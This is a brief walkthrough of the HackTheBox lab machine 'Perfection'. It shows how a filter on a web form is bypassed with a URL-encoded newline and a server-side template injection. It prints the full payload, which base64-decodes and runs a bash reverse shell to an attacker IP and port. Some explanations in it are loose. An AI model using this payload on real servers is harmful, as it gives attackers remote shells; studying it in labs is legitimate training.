🧗Perfection
https://app.hackthebox.com/machines/Perfection
After the enumeration we find a webpage where we can submit some data, let's try to input a reverse shell →
it did not work so after looking for a bit:
I saw that the framework webrick was vulnerable to URL encoding
So on cyberchef I encoded the reverse shell:
set up a listener with the good lhost and port ->
Submitting it in the form did not work, so i fired up burp
the payload needed to be encoded in base64 then url encoded and looks like this:
and final payload:
so the request looks like:
%0A
: This represents a newline character (line feed). It is used to break the line and start a new line in the code.<%25%3dsystem("echo+YmFzaCAtaSA%2BJiAvZGV2L3RjcC8xMC4xMC4xNC42Mi83MzczIDA%2BJjE%3D|+base64+-d+|+bash");%25>
: This part of the payload is URL-encoded. After decoding, it becomes<%=system("echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC42Mi83MzczIDA+JjE=| base64 -d | bash");%>
. This code snippet uses the server-side scripting tag<% %>
(commonly used in languages like PHP or ASP) to execute a system command.The system command being executed is
echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC42Mi83MzczIDA+JjE=| base64 -d | bash
. Breaking it down further:echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC42Mi83MzczIDA+JjE=
: This part echoes a base64-encoded string.| base64 -d
: This pipes the echoed string to thebase64
command with the-d
option, which decodes the base64-encoded string.| bash
: Finally, the decoded string is piped to thebash
shell for execution.
Last updated